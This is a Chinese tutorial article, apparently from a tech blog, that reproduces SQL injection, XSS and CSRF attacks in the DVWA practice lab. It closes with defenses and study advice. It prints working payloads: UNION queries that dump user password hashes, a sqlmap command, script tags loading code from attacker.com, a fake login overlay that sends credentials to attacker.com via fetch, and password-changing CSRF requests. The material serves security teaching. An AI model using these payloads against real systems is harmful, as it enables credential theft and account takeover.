当前位置：首页 > article >正文

别再只背OWASP Top 10了！用DVWA靶场手把手复现SQL注入、XSS、CSRF三大漏洞（附实战截图）

article 2026/3/24 8:12:14

从零构建Web安全实战能力DVWA靶场中的SQL注入、XSS与CSRF深度攻防当你在浏览器地址栏输入一个网址时是否想过这简单的动作背后隐藏着多少安全博弈Web安全不是纸上谈兵的理论竞赛而是真刀真枪的攻防对抗。本文将带你走进DVWADamn Vulnerable Web Application靶场用最直观的方式拆解三大经典漏洞的攻防逻辑。1. 环境搭建与靶场配置在开始实战前我们需要一个安全的实验环境。DVWA作为专为安全学习设计的漏洞演练平台其低安全级别Low Security Level模式非常适合新手入门。以下是本地部署的完整流程# 使用Docker快速部署DVWA环境 docker pull vulnerables/web-dvwa docker run -d -p 8080:80 --name dvwa vulnerables/web-dvwa访问http://localhost:8080后你会看到登录页面。默认凭证为用户名admin密码password注意实验结束后务必关闭容器避免暴露在公网docker stop dvwa首次登录后需点击Create / Reset Database按钮初始化数据库。关键步骤是在DVWA Security选项卡中将安全级别调整为Low这样才能触发所有预设漏洞。2. SQL注入实战从数据窃取到系统接管在DVWA的SQL Injection模块我们面对的是一个典型的用户查询接口。输入用户ID返回对应信息这看似简单的功能背后却暗藏杀机。2.1 基础注入探测尝试输入1 and 11页面正常返回用户信息再输入1 and 12页面返回空结果。这种差异立即暴露了SQL语句拼接漏洞。通过以下payload可以逐步获取数据库信息1 UNION SELECT 1,concat(table_name),3,4 FROM information_schema.tables WHERE table_schemadatabase()-- -这段代码会返回当前数据库的所有表名其中关键系统表包含users存储系统用户凭证guestbook留言板数据2.2 进阶数据提取获取表结构后构造特殊查询提取敏感信息1 UNION SELECT 1,concat(user,:,password),3,4 FROM users-- -你会得到类似admin:5f4dcc3b5aa765d61d8327deb882cf99的结果这是经过MD5哈希处理的密码。使用在线破解工具如CrackStation可以轻松还原出原始密码本例为password。2.3 自动化工具辅助手工注入效率较低我们可以使用sqlmap进行自动化检测sqlmap -u http://localhost:8080/vulnerabilities/sqli/?id1SubmitSubmit --cookiePHPSESSIDyour_session_id --batch参数说明--cookie保持已登录状态--batch自动选择默认选项提示真实环境中使用自动化工具可能触发WAF报警建议先进行指纹识别和速率控制3. XSS攻击剖析客户端的安全噩梦跨站脚本攻击XSS就像web世界的特洛伊木马攻击者将恶意脚本注入到可信网站中当其他用户访问时自动执行。DVWA的XSS Reflected模块完美展示了这种攻击的威力。3.1 基础攻击演示在输入框尝试以下payloadscriptalert(document.cookie)/script提交后页面会弹窗显示当前会话的cookie信息。这意味着攻击者可以窃取用户身份凭证实现会话劫持。3.2 存储型XSS实战切换到XSS Stored模块在留言板中输入iframe srcjavascript:alert(XSS)/iframe这段代码会被永久存储在服务器上任何访问留言板的用户都会触发恶意脚本。更危险的payload可以加载外部脚本script srchttp://attacker.com/malware.js/script3.3 高级攻击技巧结合社会工程学可以构造钓鱼攻击div styleposition:absolute;top:0;left:0;width:100%;height:100%;background:white; h1系统升级通知/h1 p请输入您的登录凭证/p input typetext idusername input typepassword idpassword button onclickstealCredentials()提交/button script function stealCredentials() { fetch(http://attacker.com/steal?udocument.getElementById(username).valuepdocument.getElementById(password).value) } /script /div4. CSRF攻击身份验证的盲区跨站请求伪造CSRF利用的是浏览器的同源策略信任机制。DVWA的CSRF模块展示了如何悄无声息地修改用户密码。4.1 基础攻击构造登录DVWA后观察正常修改密码的请求GET /vulnerabilities/csrf/?password_new123password_conf123ChangeChange HTTP/1.1攻击者只需诱使用户访问包含以下代码的页面img srchttp://localhost:8080/vulnerabilities/csrf/?password_newhackedpassword_confhackedChangeChange width0 height0当用户浏览器加载该图片时会自动发送修改密码请求而用户完全无感知。4.2 高级攻击链构建结合XSS和CSRF可以形成更强大的攻击fetch(/vulnerabilities/csrf/, { method: POST, body: password_newevilpassword_confevilChangeChange, credentials: include })这段JavaScript可以在XSS漏洞环境下执行实现更隐蔽的攻击。5. 防御措施与安全编码实践了解攻击手段后我们需要构建有效的防御体系。以下是三种漏洞的防护方案对比漏洞类型防御策略代码示例SQL注入参数化查询$stmt $pdo-prepare(SELECT * FROM users WHERE id ?);XSS输出编码htmlspecialchars($input, ENT_QUOTES, UTF-8);CSRFAnti-CSRF Tokeninput typehidden nametoken value? $_SESSION[token] ?5.1 深度防御策略输入验证的黄金法则定义明确的白名单规则在客户端和服务端实施双重验证对特殊字符进行转义处理限制输入长度和类型会话管理要点设置HttpOnly和Secure标志的Cookie实施合理的会话超时机制对敏感操作要求重新认证在DVWA的高安全级别High Security Level模式下可以看到这些防御措施的实际效果。比如SQL注入模块使用了预处理语句XSS模块实施了严格的输出过滤。6. 构建持续安全的学习路径Web安全是不断演进的领域建议按照以下路线持续提升基础巩固OWASP Cheat Sheet系列Web安全测试指南如《Web Application Hackers Handbook》工具掌握Burp Suite社区版OWASP ZAPNmap基础扫描实战演练Hack The Box初级靶机PortSwigger Web安全学院CTF比赛基础题目每次实验后建议记录攻击步骤和防御方案形成自己的安全笔记。真正的安全专家不是记住所有漏洞而是培养发现漏洞的思维方式。

别再只背OWASP Top 10了！用DVWA靶场手把手复现SQL注入、XSS、CSRF三大漏洞（附实战截图）

相关文章：

别再只背OWASP Top 10了！用DVWA靶场手把手复现SQL注入、XSS、CSRF三大漏洞（附实战截图）

Git命令避坑指南：那些你可能会遇到的‘坑’及解决方案

Z-Image Atelier 故障排除：常见安装包依赖冲突与解决方案

别再只爬静态网页了！手把手教你用Requests+BeautifulSoup搞定懂车帝动态数据（2024实战）

基于RMBG-2.0的智能相册管理系统：自动分类与背景优化

AI图像放大神器Swin2SR：简单部署，修复模糊照片

Magento PolyShell漏洞引发严重安全威胁，可导致远程代码执行

北京市自动驾驶汽车年度评估报告（2024-2025） 2025

Gazebo新手避坑：别再被黄黑格子地面搞心态了，手把手教你搞定纯色/贴图地面

丹青识画系统Java八股文实践：设计模式在系统架构中的应用

别再只写‘Hello World’了！用C语言sprintf函数演示缓冲区溢出攻击（Windows环境）

SEO_五个立竿见影的页面SEO优化技巧

遥感影像批量预处理总失败？这4类CRS投影错配、HDF5结构陷阱、云掩膜逻辑漏洞，90%开发者至今未察觉

Python色彩科学完整指南：从入门到专业应用的Colour-Science库

MinerU在企业知识管理中的落地应用：OCR+图文问答构建智能文档中枢

百川2-13B-4bits量化版AI编程助手实战：代码补全与注释生成

工业级交互设计：用Three.js实现六轴机器人丝滑控制（附GitHub源码）

统信UOS桌面系统命令行速查手册：从文件管理到系统维护的20个高频命令

如何用OpCore-Simplify在15分钟内完成黑苹果配置：零代码终极指南

Hunyuan-OCR-WEBUI多实例快速上手：一键部署财务票据识别服务

Qt开发浦语灵笔2.5-7B图形界面应用实战

Android NFC实战：三步实现非接触IC卡读取

MedGemma 1.5实战：五个真实医学问题，看AI如何一步步推理

C++多态性实战：从抽象类Shape到计算圆柱和球体体积（附完整代码）

DCT-Net人像卡通化镜像优化：体积压缩40%，启动速度提升34%

OpenCode：开源AI编程助手的终端革命

告别模拟音频线！用MAX98357A这颗D类功放芯片，5分钟搞定I2S数字音频播放模块

Windows Server 2022 中文版、英文版下载 (2026 年 3 月更新)

一文读懂内网渗透：从边界突破到域控失守，红队实战方法论总结

Oracle 19C在SUSE系统安装避坑指南：系统识别失败(PRVG-0282)的3种解决姿势